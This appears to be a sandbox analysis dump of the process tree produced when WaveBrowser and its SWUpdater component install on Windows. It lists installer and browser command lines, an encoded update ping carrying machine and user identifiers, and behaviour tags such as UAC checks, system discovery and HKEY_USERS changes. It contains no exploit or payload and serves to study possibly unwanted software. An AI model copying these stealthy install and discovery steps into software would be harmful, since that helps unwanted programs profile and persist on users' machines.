C:\Users\Admin\Wavesor Software\SWUpdater\SWUpdater.exe"C:\Users\Admin\Wavesor Software\SWUpdater\SWUpdater.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJTV1VwZGF0ZXIiIHVwZGF0ZXJ2ZXJzaW9uPSIxLjMuMTM1LjAiIHNoZWxsX3ZlcnNpb249IjEuMy4xMzUuMCIgaXNtYWNoaW5lPSIwIiBzZXNzaW9uaWQ9Ins1RDVBQTE1NS00M0Q1LTQ1QTMtQThFQy1CNEM2RkU3RTU5OEF9IiB1c2VyaWQ9Ins5NDBlZTU3NS1jNTk0LTRmNjQtOGE5Ni0yNGJmOWI2MGJkYWJ9IiBpbnN0YWxsc291cmNlPSJvdGhlcmluc3RhbGxjbWQiIHJlcXVlc3RpZD0iezRDRkUwOTQzLUQyRkEtNEExNS05OTJFLTA2RERENDU0RTJBNn0iIGRlZHVwPSJjciIgZG9tYWluam9pbmVkPSIwIj48aHcgcGh5c21lbW9yeT0iOCIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0MS4xMjg4IiBzcD0iIiBhcmNoPSJ4NjQiLz48YXBwIGFwcGlkPSJ7RjZGNjBBQ0UtNzFBRC00NjEwLTgwRDQtOTI1MzcyOUZCNEI3fSIgdmVyc2lvbj0iIiBuZXh0dmVyc2lvbj0iMS4zLjEzNS4wIiBsYW5nPSJlbiIgYnJhbmQ9IiIgY2xpZW50PSIiPjxldmVudCBldmVudHR5cGU9IjIiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIGluc3RhbGxfdGltZV9tcz0iMjQzIi8-PC9hcHA-PC9yZXF1ZXN0Pg5⤵
- Checks whether UAC is enabled
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:3956
-
-
C:\Users\Admin\Wavesor Software\SWUpdater\SWUpdater.exe"C:\Users\Admin\Wavesor Software\SWUpdater\SWUpdater.exe" /handoff "bundlename=WaveBrowser&appguid={EB149AD2-CE4E-4F51-B7FC-A149FAA4CCAF}&appname=WaveBrowser&needsadmin=False&lang=en&usagestats=1&installdataindex=1" /installsource otherinstallcmd /sessionid "{5D5AA155-43D5-45A3-A8EC-B4C6FE7E598A}"5⤵
- Checks whether UAC is enabled
- System Location Discovery: System Language Discovery
PID:8308
-
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=9632,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=12080 /prefetch:82⤵PID:8908
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=10532,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=10228 /prefetch:82⤵PID:7492
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations=is-enterprise-managed=no --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=105 --field-trial-handle=7392,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=5956 /prefetch:12⤵
- Checks computer location settings
PID:7456
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\131.0.2903.70\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\131.0.2903.70\elevation_service.exe"1⤵PID:8828
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default1⤵PID:2824
-
C:\Users\Admin\Wavesor Software\SWUpdater\SWUpdater.exe"C:\Users\Admin\Wavesor Software\SWUpdater\SWUpdater.exe" -Embedding1⤵
- Checks computer location settings
- Checks whether UAC is enabled
- System Location Discovery: System Language Discovery
PID:6984 -
C:\Users\Admin\Wavesor Software\SWUpdater\Install\{FFD604C4-7421-48DD-8B8C-83C9583A1EFB}\WaveInstaller-v1.5.19.4.exe"C:\Users\Admin\Wavesor Software\SWUpdater\Install\{FFD604C4-7421-48DD-8B8C-83C9583A1EFB}\WaveInstaller-v1.5.19.4.exe" /installerdata="C:\Users\Admin\AppData\Local\Temp\gui990B.tmp"2⤵
- System Location Discovery: System Language Discovery
PID:7848 -
C:\Users\Admin\AppData\Local\Temp\nsg9C19.tmp\setup.exe"C:\Users\Admin\AppData\Local\Temp\nsg9C19.tmp\setup.exe" --install-archive="C:\Users\Admin\AppData\Local\Temp\nsg9C19.tmp\wavebrowser.packed.7z" --wid=e1620o1z --installerdata="C:\Users\Admin\AppData\Local\Temp\gui990B.tmp"3⤵PID:116
-
C:\Users\Admin\AppData\Local\Temp\nsg9C19.tmp\setup.exeC:\Users\Admin\AppData\Local\Temp\nsg9C19.tmp\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\WaveBrowser\User Data\Crashpad" --annotation=channel= --annotation=plat=Win64 --annotation=prod=WaveBrowser --annotation=ver=1.5.19.4 --initial-client-data=0x278,0x27c,0x280,0x254,0x284,0x7ff6d69ab370,0x7ff6d69ab37c,0x7ff6d69ab3884⤵PID:3952
-
-
C:\Users\Admin\AppData\Local\Temp\nsg9C19.tmp\setup.exe"C:\Users\Admin\AppData\Local\Temp\nsg9C19.tmp\setup.exe" --verbose-logging --installerdata="C:\Users\Admin\AppData\Local\Temp\gui990B.tmp" --create-shortcuts=0 --install-level=04⤵PID:8600
-
C:\Users\Admin\AppData\Local\Temp\nsg9C19.tmp\setup.exeC:\Users\Admin\AppData\Local\Temp\nsg9C19.tmp\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\WaveBrowser\User Data\Crashpad" --annotation=channel= --annotation=plat=Win64 --annotation=prod=WaveBrowser --annotation=ver=1.5.19.4 --initial-client-data=0x278,0x27c,0x280,0x250,0x284,0x7ff6d69ab370,0x7ff6d69ab37c,0x7ff6d69ab3885⤵PID:6912
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://install.convertwithwave.com/thank-you?tid=e1620o1z&src=d-d-cp21727671082-lp0-obem-wav-igdVePjtAUUnKmCXrSvg-ab15-w64-wn104-brwsr&cid=21727671082&iid=wav-cvt&uid=940ee575-c594-4f64-8a96-24bf9b60bdab4⤵PID:1112
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --install-type=1 --from-installer4⤵
- Checks computer location settings
- Checks system information in the registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:4728 -
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\WaveBrowser\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\WaveBrowser\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\WaveBrowser\User Data" --annotation=channel= --annotation=plat=Win64 --annotation=prod=WaveBrowser --annotation=ver=1.5.19.4 --initial-client-data=0x108,0x104,0x110,0x128,0x10c,0x7ff8ad2cccf0,0x7ff8ad2cccfc,0x7ff8ad2ccd085⤵PID:2456
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=gpu-process --no-appcompat-clear --start-stack-profiler --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2292,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=2288 /prefetch:25⤵PID:6564
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --start-stack-profiler --field-trial-handle=1756,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=2464 /prefetch:35⤵PID:4108
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1900,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=3572 /prefetch:85⤵PID:384
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2636,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=3636 /prefetch:15⤵PID:7516
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2644,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=3880 /prefetch:25⤵PID:3068
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=chrome.mojom.ProfileImport --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3444,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=4192 /prefetch:85⤵
- Checks computer location settings
PID:9152
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4488,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=4492 /prefetch:85⤵PID:9104
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4480,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=4656 /prefetch:85⤵PID:8864
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4632,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=4688 /prefetch:85⤵PID:3008
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=4732,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=4920 /prefetch:15⤵
- Checks computer location settings
PID:3144
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --no-appcompat-clear --start-stack-profiler --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=4752,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=4744 /prefetch:15⤵PID:8100
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=4760,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=5056 /prefetch:15⤵PID:5024
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=4768,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=5172 /prefetch:15⤵PID:8780
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=4776,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=5404 /prefetch:15⤵
- Checks computer location settings
PID:5520
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=4784,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=5560 /prefetch:15⤵
- Checks computer location settings
PID:8488
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=4792,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=5680 /prefetch:15⤵PID:6688
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --field-trial-handle=4800,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=5808 /prefetch:15⤵
- Checks computer location settings
PID:4876
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --instant-process --no-appcompat-clear --start-stack-profiler --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=4808,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=5912 /prefetch:15⤵PID:1916
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --field-trial-handle=6148,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=6164 /prefetch:15⤵PID:8556
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --no-appcompat-clear --start-stack-profiler --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --field-trial-handle=6172,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=6340 /prefetch:15⤵PID:8716
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --field-trial-handle=6188,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=6424 /prefetch:15⤵
- Checks computer location settings
PID:3652
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --field-trial-handle=6196,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=6556 /prefetch:15⤵
- Checks computer location settings
PID:5448
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --no-appcompat-clear --start-stack-profiler --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --field-trial-handle=6204,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=6672 /prefetch:15⤵PID:6104
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --field-trial-handle=6228,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=6788 /prefetch:15⤵PID:1092
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --field-trial-handle=6236,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=6896 /prefetch:15⤵
- Checks computer location settings
PID:7652
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --no-appcompat-clear --start-stack-profiler --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --field-trial-handle=6292,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=7012 /prefetch:15⤵
- Checks computer location settings
PID:6556
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7764,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=7720 /prefetch:85⤵PID:7984
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7768,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=7672 /prefetch:85⤵PID:7240
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7772,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=8024 /prefetch:85⤵PID:3484
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7776,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=8172 /prefetch:85⤵PID:1336
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7780,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=8336 /prefetch:85⤵PID:8372
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=8160,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=8372 /prefetch:85⤵PID:7444
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7788,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=8532 /prefetch:85⤵PID:7628
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=8012,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=8652 /prefetch:85⤵PID:6820
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=8324,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=8912 /prefetch:85⤵PID:3956
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --field-trial-handle=7724,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=7564 /prefetch:25⤵
- Checks computer location settings
PID:1604
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=gpu-process --no-appcompat-clear --start-stack-profiler --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=6224,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=3132 /prefetch:25⤵PID:7812
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --start-stack-profiler --field-trial-handle=2464,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=3012 /prefetch:35⤵PID:8308
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=gpu-process --no-appcompat-clear --start-stack-profiler --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=4400,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=5400 /prefetch:25⤵PID:4844
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --field-trial-handle=7580,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=6152 /prefetch:15⤵PID:2320
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --field-trial-handle=6424,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=5232 /prefetch:15⤵
- Checks computer location settings
PID:7752
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --field-trial-handle=8212,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=9052 /prefetch:15⤵PID:7624
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1648,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=7156 /prefetch:85⤵PID:8024
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5352,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=6832 /prefetch:85⤵PID:5632
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6440,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=4244 /prefetch:85⤵PID:6992
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7664,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=7648 /prefetch:85⤵PID:6480
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7880,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=8436 /prefetch:85⤵PID:3484
-
-
